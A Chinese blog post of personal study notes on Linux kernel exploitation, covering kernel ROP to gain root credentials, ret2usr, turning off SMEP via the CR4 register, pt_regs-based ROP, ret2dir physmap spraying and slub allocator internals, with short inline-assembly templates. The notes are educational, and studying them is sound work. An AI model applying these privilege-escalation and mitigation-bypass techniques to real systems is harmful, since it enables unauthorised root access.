<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="kernel漏洞及利用, StarrySky">
    <meta name="description" content="Love rises from the east and descends to the west,romance makes no changes until death.">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>kernel漏洞及利用 | StarrySky</title>
    <link rel="icon" type="image/jpeg" href="/favicon.jpg">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="StarrySky" type="application/atom+xml">
</head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.jpg" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">StarrySky</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>主页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>文章</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>个人简介</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友链</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.jpg" class="logo-img circle responsive-img">
        
        <div class="logo-name">StarrySky</div>
        <div class="logo-desc">
            
            Love rises from the east and descends to the west,romance makes no changes until death.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			主页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			文章
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			个人简介
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友链
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/Steel%20Gray.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">kernel漏洞及利用</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/kernel/">
                                <span class="chip bg-color">kernel</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/kernel/" class="post-category">
                                kernel
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2024-03-20
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.6k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    21 分
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>十天速通<code>kernel</code>基础理论了属于是…画了个思维导图加深一下印象</p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/kernel%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86.png" class>

<h2 id="ROP（returned-oriented-programming）"><a href="#ROP（returned-oriented-programming）" class="headerlink" title="ROP（returned oriented programming）"></a>ROP（returned oriented programming）</h2><h3 id="ROP"><a href="#ROP" class="headerlink" title="ROP"></a>ROP</h3><p>构造<code>commit_creds(&amp;init_cred)</code> 或 <code>commit_creds(prepare_kernel_cred(NULL))</code></p>
<ul>
<li><code>kallsyms</code>中存在<code>commit_creds</code>和<code>prepare_kernel_cred</code>函数地址</li>
<li><code>init</code>中<code>dmesg_restrict=1</code>时不能使用<code>dmesg</code>查看<code>kernel</code>信息</li>
</ul>
<h4 id="状态保存"><a href="#状态保存" class="headerlink" title="状态保存"></a>状态保存</h4><p>保存各寄存器的值到内核栈上便于后续回到用户态，模板如下，编译时指定参数<code>-masm=intel</code></p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token class-name">size_t</span> user_cs<span class="token punctuation">,</span> user_ss<span class="token punctuation">,</span> user_rflags<span class="token punctuation">,</span> user_sp<span class="token punctuation">;</span>
<span class="token keyword">void</span> <span class="token function">saveStatus</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token function">__asm__</span><span class="token punctuation">(</span><span class="token string">"mov user_cs, cs;"</span>
            <span class="token string">"mov user_ss, ss;"</span>
            <span class="token string">"mov user_sp, rsp;"</span>
            <span class="token string">"pushf;"</span>
            <span class="token string">"pop user_rflags;"</span>
            <span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"\033[34m\033[1m[*] Status has been saved.\033[0m"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="返回用户态"><a href="#返回用户态" class="headerlink" title="返回用户态"></a>返回用户态</h5><ul>
<li><code>swapgs</code>指令恢复用户态 <code>GS</code> 寄存器</li>
<li><code>sysretq</code>或者<code>iretq</code>恢复到用户空间</li>
</ul>
<p>那么我们只需要在内核中找到相应的 <code>gadget</code> 并执行<code>swapgs;iretq</code>就可以成功着陆回用户态。</p>
<p>通常来说，我们应当构造如下 <code>rop</code> 链以返回用户态并获得一个 <code>shell</code>：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">↓   swapgs
    iretq
    user_shell_addr
    user_cs
    user_eflags //64bit user_rflags
    user_sp
    user_ss<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h3 id="ret2usr"><a href="#ret2usr" class="headerlink" title="ret2usr"></a>ret2usr</h3><p><code>smap/smep</code>未开启的时候内核可以访问执行用户空间数据，所以可以通过<code>kernel rop</code>以内核<code>ring 0</code>权限执行用户空间代码，主要是执行<code>commit_creds(prepare_kernel_cred(NULL))</code>，需要提前在用户态程序构造好对应的函数指针、获取相应函数地址后直接<code>ret</code>回到用户空间执行</p>
<h3 id="bypass-smep"><a href="#bypass-smep" class="headerlink" title="bypass-smep"></a>bypass-smep</h3><h4 id="SMEP"><a href="#SMEP" class="headerlink" title="SMEP"></a>SMEP</h4><p>为了防止 <code>ret2usr</code> 攻击，内核开发者提出了 <code>smep</code> 保护，当 CPU 处于 <code>ring0</code> 模式时，执行用户空间的代码会触发页错误，这个保护在 <code>arm</code> 中被称为 <code>PXN</code></p>
<h4 id="smep-和-CR4-寄存器"><a href="#smep-和-CR4-寄存器" class="headerlink" title="smep 和 CR4 寄存器"></a>smep 和 CR4 寄存器</h4><p>系统根据 <code>CR4</code> 寄存器的值判断是否开启 <code>smep</code> 保护，当 <code>CR4</code> 寄存器的第 <code>20</code> 位是 <code>1</code> 时，保护开启,是 <code>0</code> 时，保护关闭</p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/smep.jpg" class>

<p><code>CR4</code> 寄存器可以通过 <code>mov</code> 指令修改<code>cr4</code>来关闭<code>smep</code>保护</p>
<pre class="line-numbers language-none"><code class="language-none">mov cr4, 0x1407e0
# 0x1407e0 &#x3D; 101 0 0000 0011 1111 00000<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>搜索一下从 <code>vmlinux</code> 中提取出的 <code>gadget</code>，很容易就能达到这个目的</p>
<ul>
<li>查看 <code>CR4</code> 寄存器的值<ul>
<li><code>gdb</code> 无法查看 <code>cr4</code> 寄存器的值，可以通过 <code>kernel crash</code> 时的信息查看。为了关闭 <code>smep</code> 保护，常用一个固定值 <code>0x6f0</code>，即 <code>mov cr4, 0x6f0</code></li>
</ul>
</li>
</ul>
<h3 id="利用-pt-regs-构造通用内核-ROP"><a href="#利用-pt-regs-构造通用内核-ROP" class="headerlink" title="利用 pt_regs 构造通用内核 ROP"></a>利用 pt_regs 构造通用内核 ROP</h3><h4 id="系统调用-与-pt-regs-结构体"><a href="#系统调用-与-pt-regs-结构体" class="headerlink" title="系统调用 与 pt_regs 结构体"></a>系统调用 与 pt_regs 结构体</h4><p>系统调用：用户态布置好相应的参数后执行 <code>syscall</code> 进入到内核中的 <code>entry_SYSCALL_64</code>，随后通过系统调用表跳转到对应的函数</p>
<p><code>entry_SYSCALL_64</code> ：当程序进入到内核态时，该函数会将所有的寄存器<strong>压入内核栈上，形成一个 pt_regs 结构体</strong>，该结构体实质上位于内核栈底</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">struct</span> <span class="token class-name">pt_regs</span> <span class="token punctuation">&#123;</span>
<span class="token comment">/*
 * C ABI says these regs are callee-preserved. They aren't saved on kernel entry
 * unless syscall needs a complete, fully filled "struct pt_regs".
 */</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> r15<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> r14<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> r13<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> r12<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> rbp<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> rbx<span class="token punctuation">;</span>
<span class="token comment">/* These regs are callee-clobbered. Always saved on kernel entry. */</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> r11<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> r10<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> r9<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> r8<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> rax<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> rcx<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> rdx<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> rsi<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> rdi<span class="token punctuation">;</span>
<span class="token comment">/*
 * On syscall entry, this is syscall#. On CPU exception, this is error code.
 * On hw interrupt, it's IRQ number:
 */</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> orig_rax<span class="token punctuation">;</span>
<span class="token comment">/* Return frame for iretq */</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> rip<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> cs<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> eflags<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> rsp<span class="token punctuation">;</span>
    <span class="token keyword">unsigned</span> <span class="token keyword">long</span> ss<span class="token punctuation">;</span>
<span class="token comment">/* top of stack page */</span>
<span class="token punctuation">&#125;</span><span class="token punctuation">;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h4 id="内核栈与通用ROP"><a href="#内核栈与通用ROP" class="headerlink" title="内核栈与通用ROP"></a>内核栈与通用ROP</h4><p>内核栈<strong>只有一个页面的大小</strong>，而 <code>pt_regs</code> 结构体则固定位于<strong>内核栈栈底</strong>，劫持内核结构体中的某个函数指针（例如 <code>seq_operations-&gt;start</code>）并通过该函数指针劫持内核执行流时 <strong>rsp 与 栈底的相对偏移通常是不变的</strong></p>
<p>系统调用过程中的这些寄存器为我们布置 <code>ROP</code> 链提供了可能，<strong>只需要寻找到一条形如 <code>add rsp, val ; ret</code> 的 gadget 便能够完成 ROP</strong></p>
<p>模板：</p>
<pre class="line-numbers language-assembly" data-language="assembly"><code class="language-assembly">__asm__(
    &quot;mov r15,   0xbeefdead;&quot;
    &quot;mov r14,   0x11111111;&quot;
    &quot;mov r13,   0x22222222;&quot;
    &quot;mov r12,   0x33333333;&quot;
    &quot;mov rbp,   0x44444444;&quot;
    &quot;mov rbx,   0x55555555;&quot;
    &quot;mov r11,   0x66666666;&quot;
    &quot;mov r10,   0x77777777;&quot;
    &quot;mov r9,    0x88888888;&quot;
    &quot;mov r8,    0x99999999;&quot;
    &quot;xor rax,   rax;&quot;
    &quot;mov rcx,   0xaaaaaaaa;&quot;
    &quot;mov rdx,   8;&quot;
    &quot;mov rsi,   rsp;&quot;
    &quot;mov rdi,   seq_fd;&quot;        &#x2F;&#x2F; 这里假定通过 seq_operations-&gt;stat 来触发
    &quot;syscall&quot;
);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>新版本内核中为系统调用栈添加了一个偏移值，这意味着 <code>pt_regs</code> 与我们触发劫持内核执行流时的栈间偏移值不再是固定值，在这个随机偏移值较小且我们仍有足够多的寄存器可用的情况下，仍然可以通过布置一些 <code>slide gadget</code> 来继续完成利用，不过稳定性也大幅下降了</p>
<h3 id="ret2dir"><a href="#ret2dir" class="headerlink" title="ret2dir"></a>ret2dir</h3><p>主要用来<strong>绕过 smep、smap、pxn 等用户空间与内核空间隔离的防护手段</strong></p>
<p>我们首先来思考一下 <code>x86</code> 下的 <code>Linux kernel</code> 的内存布局，存在着这样的一块区域叫做 <code>direct mapping area</code>，<strong>线性地直接映射了整个物理内存空间</strong>：</p>
<pre class="line-numbers language-bash" data-language="bash"><code class="language-bash">ffff888000000000 <span class="token operator">|</span> <span class="token parameter variable">-119.5</span>  TB <span class="token operator">|</span> ffffc87fffffffff <span class="token operator">|</span>   <span class="token number">64</span> TB <span class="token operator">|</span> direct mapping of all physical memory <span class="token punctuation">(</span>page_offset_base<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>这块区域的存在意味着：对于一个被用户进程使用的物理页框，<strong>同时存在着一个用户空间地址与内核空间地址到该物理页框的映射</strong>，即我们利用这两个地址进行内存访问时访问的是同一个物理页框</p>
<p>当开启了 <code>SMEP、SMAP、PXN</code> 等防护时，内核空间到用户空间的直接访问被禁止，<strong>我们无法直接使用类似 ret2usr 这样的攻击方式</strong>，但利用内核线性映射区对整个物理地址空间的映射，<strong>我们可以利用一个内核空间上的地址访问到用户空间的数据，从而绕过 SMEP、SMAP、PXN 等传统的隔绝用户空间与内核空间的防护手段</strong></p>
<p>下图是<code>ret2dir</code> 的示例，在用户空间中布置的 <code>gadget</code> 可以通过 <code>direct mapping area</code> 上的地址<strong>在内核空间中访问到</strong>：</p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/ret2dir-shellcode.png" class>

<p>新版的内核当中 <code>direct mapping area</code> 已经不再具有可执行权限，因此很难在用户空间直接布置 <code>shellcode</code> 进行利用，但仍能通过在用户空间布置 <code>ROP</code> 链的方式完成利用：</p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/ret2dir-rop.png" class>

<p><code>ret2dir</code> 攻击的手法：</p>
<ul>
<li>利用 <code>mmap</code> 在用户空间大量喷射内存</li>
<li>利用漏洞泄露出内核的 “堆” 上地址（通过 <code>kmalloc</code> 获取到的地址），<strong>这个地址<u>直接来自于线性映射区</u></strong></li>
<li>利用泄露出的内核线性映射区的地址<strong>进行内存搜索</strong>，从而找到我们在用户空间喷射的内存</li>
</ul>
<p>此时获得了一个映射到用户空间的内核空间地址，通过这个内核空间地址便能直接访问到用户空间的数据，避开传统的隔绝用户空间与内核空间的防护手段</p>
<p>需要注意的是我们往往没有内存搜索的机会，因此需要使用 <code>mmap</code> 喷射大量的物理内存写入同样的 <code>payload</code>，之后再随机挑选一个线性映射区上的地址进行利用，这样就有很大的概率命中到我们布置的 <code>payload</code> 上，这种攻击手法也称为 <code>physmap spray</code></p>
<h2 id="Heap"><a href="#Heap" class="headerlink" title="Heap"></a>Heap</h2><h3 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h3><h4 id="内存三级结构"><a href="#内存三级结构" class="headerlink" title="内存三级结构"></a>内存三级结构</h4><img src="/2024/03/20/kernel-lou-dong-ji-li-yong/page-zone-node.png" class>

<ul>
<li><p>页-<code>page</code></p>
<p><code>linux kernel</code>使用<code>page</code>结构体表示一个物理页，对应图中结构体<code>page</code></p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/page_struct.png" class>
</li>
<li><p>区-<code>zone</code></p>
<p><code>linux</code>将一个<strong>节点内</strong>不同用途的内存区域划分为不同的区，对应图中结构体<code> zone</code></p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/zone_struct.png" class>
</li>
<li><p>节点-<code>node</code></p>
<p><code>Linux</code> 将内存控制器（<code>memory controller</code>）作为节点划分的依据，同一个内存控制器下的 <code>CPU</code> 对应的节点称之为<strong>本地内存</strong>，不同处理器之间通过总线进行进一步的连接，对应图中结构体<code>pgdata_list</code></p>
</li>
</ul>
<h4 id="内存管理器"><a href="#内存管理器" class="headerlink" title="内存管理器"></a>内存管理器</h4><ul>
<li><p><code>buddy system</code></p>
<p>负责以<strong>内存页</strong>为粒度管理所有可用的物理内存,存在于<strong>区级别</strong>，对当前区的所有物理页进行管理，每个区<code>zone</code>结构体中有<code>free_area</code>结构体数组，存储<code>buddy system</code>按照<code>order</code>管理的页面，其中<code>MAX_ORDER = 11</code></p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token keyword">struct</span> <span class="token class-name">zone</span> <span class="token punctuation">&#123;</span>
    <span class="token comment">//...</span>
    <span class="token keyword">struct</span> <span class="token class-name">free_area</span>    free_area<span class="token punctuation">[</span>MAX_ORDER<span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token comment">//...</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>在 <code>buddy system</code> 中按照空闲页面的连续大小进行分阶管理，这里的 <code>order</code> 的实际含义为<strong>连续的空闲页面的大小</strong>，单位是<code>阶</code>，即对于每个下标存储的页面大小为<code>2^order</code>，参考区结构体的图</p>
<ul>
<li><p>分配：</p>
<p>大小向 <code>2</code> 的幂次方内存页大小对齐，从对应的下标取出连续内存页，若对应下标链表为空，则会从下一个 <code>order</code> 中取出内存页，一分为二，装载到当前下标对应链表中，之后再返还给上层调用</p>
</li>
<li><p>释放：</p>
<p>将对应的连续内存页释放到对应的链表上，检索是否有可以合并的内存页，若有则进行合成，放入更高 <code>order</code> 的链表中</p>
</li>
</ul>
</li>
<li><p><code>slab allocator</code></p>
<ul>
<li><p>向<code>buddy system</code>请求内存页（<code>sllub</code>）并分割成同等大小的<strong>对象</strong>（<code>object</code>，被分配实体）返还给上层调用者以进行细粒度的内存管理</p>
</li>
<li><p>分为<code>slab</code>、<code>slob</code>、<code>slub</code>三种版本，其中<code>slub</code>是现在通用的版本，其结构如下：</p>
<img src="/2024/03/20/kernel-lou-dong-ji-li-yong/slub_allocator.png" class>

<p><code>slub</code> 的<strong>第一张内存页</strong>的 <strong><code>page</code> 结构体</strong>的 <strong><code>freelist</code> 成员</strong>指向该张<strong>内存页</strong>上的<strong>第一个空闲对象</strong>，一个 <code>slub</code> 上的所有空闲对象组成一个以 <code>NULL</code> 结尾的单向链表</p>
<blockquote>
<p><code>object</code> 类似<code> glibc</code> 中的 <code>chunk</code>，但是不需要<code>header</code>，因为 <code>page </code>结构体与物理内存间存在线性对应关系</p>
</blockquote>
</li>
<li><p><code>kmem_cache</code> ：基本的 <code>allocator</code> 组件，用于分配某个特定大小或用途的对象，所有的 <code>kmem_cache</code>构成一个双向链表，并存在两个对应的结构体数组 <code>kmalloc_caches</code> 与 <code>kmalloc_dma_caches</code></p>
<p>组成模块：</p>
<ul>
<li><code>kmem_cache_cpu</code>：**<code>percpu</code> 变量<strong>（以 <code>gs</code> 寄存器作为 <code>percpu</code> 段的基址，每个核心上都通过段寻址来独立保留一个副本），用以表示当前核心正在使用的 <code>slub</code>，因此当前 <code>CPU</code> 在从 <code>kmem_cache_cpu</code> 上取 <code>object </code>时</strong>不需要加锁**，极大地提高了性能</li>
<li><code>kmem_cache_node</code>:当前<code>kmem_cache</code>的<code> slub</code> 集散中心，其中存放着两个 <code>slub</code> 链表：<ul>
<li><code>partial</code>：部分 <code>object</code>空闲</li>
<li><code>full</code>：所有<code>object</code>都被分配出去</li>
</ul>
</li>
</ul>
</li>
<li><p>分配：</p>
<ul>
<li>首先从 <code>kmem_cache_cpu</code> 上取对象，若有则直接返回</li>
<li>若 <code>kmem_cache_cpu</code> 上的 <code>slub</code> 已经无空闲对象了，对应 <code>slub</code> 会被从 <code>kmem_cache_cpu</code> 上取下，并尝试从 <strong><code>partial</code></strong> 链表上取一个 <code>slub</code> 挂载到 <code>kmem_cache_cpu</code> 上，然后再取出空闲对象返回</li>
<li>若 <code>kmem_cache_node</code> 的 <code>partial</code> 链表也空了，那就<strong>向 <code>buddy system</code> 请求分配新的内存页</strong>，划分为多个 <code>object</code> 之后再给到 <code>kmem_cache_cpu</code>，取空闲对象返回上层调用</li>
</ul>
</li>
<li><p>释放：</p>
<ul>
<li>若被释放 <code>object</code> 属于 <code>kmem_cache_cpu</code> 的 <code>slub</code>或<code>kmem_cache_node</code> 的 <code>partial</code> 链表上的 <code>slub</code>，直接使用头插法插入当前 <code>CPU slub</code> 或对应<code>slub</code>的 <code>freelist</code></li>
<li>若被释放 <code>object </code>为 <code>full slub</code>，则成为对应 <code>slub</code> 的 <code>freelist</code> 头节点，<strong>且该 slub 会被放置到 partial 链表</strong></li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="slub-allocator"><a href="#slub-allocator" class="headerlink" title="slub allocator"></a>slub allocator</h3><h4 id="kernel-UAF"><a href="#kernel-UAF" class="headerlink" title="kernel UAF"></a>kernel UAF</h4><p><strong>对于释放后未重置的垂悬指针的利用</strong>,内核的 “堆内存” 主要指的是直接映射区（<code>direct mapping area</code>）</p>
<h5 id="内核堆利用与绑核"><a href="#内核堆利用与绑核" class="headerlink" title="内核堆利用与绑核"></a>内核堆利用与绑核</h5><p>在多核架构下存在多个 <code>kmem_cache_cpu</code> ，利用过程中<code>kernel object</code>的分配有可能会来自不同的 <code>kmem_cache_cpu</code> ，降低了漏洞利用的成功率，因此需要将进程绑定到特定的某个 <code>CPU</code> 核心上，这样 <code>slub allocator</code> 的模型就简化成了 <code>kmem_cache_node + kmem_cache_cpu</code> </p>
<p>进程绑定至指定核心的模板:</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sched.h></span></span>

<span class="token comment">/* to run the exp on the specific core only */</span>
<span class="token keyword">void</span> <span class="token function">bind_cpu</span><span class="token punctuation">(</span><span class="token keyword">int</span> core<span class="token punctuation">)</span>
<span class="token punctuation">&#123;</span>
    <span class="token class-name">cpu_set_t</span> cpu_set<span class="token punctuation">;</span>

    <span class="token function">CPU_ZERO</span><span class="token punctuation">(</span><span class="token operator">&amp;</span>cpu_set<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">CPU_SET</span><span class="token punctuation">(</span>core<span class="token punctuation">,</span> <span class="token operator">&amp;</span>cpu_set<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">sched_setaffinity</span><span class="token punctuation">(</span><span class="token function">getpid</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token keyword">sizeof</span><span class="token punctuation">(</span>cpu_set<span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>cpu_set<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<h5 id="通用-kmalloc-flag"><a href="#通用-kmalloc-flag" class="headerlink" title="通用 kmalloc flag"></a>通用 kmalloc flag</h5><p><code>GFP_KERNEL</code> 、 <code>GFP_KERNEL_ACCOUNT</code> ：内核中最为常见与通用的分配 <code>flag</code>，分配都来自同一个 <code>kmem_cache</code>，即通用的 <code>kmalloc-xx</code></p>
<p><code>GFP_KERNEL_ACCOUNT</code> 多了一个表示该对象与来自用户空间的数据相关联的属性，因此诸如 <code>msg_msg</code> 、<code>pipe_buffer</code>、<code>sk_buff</code>的数据包的分配使用的都是 <code>GFP_KERNEL_ACCOUNT</code> </p>
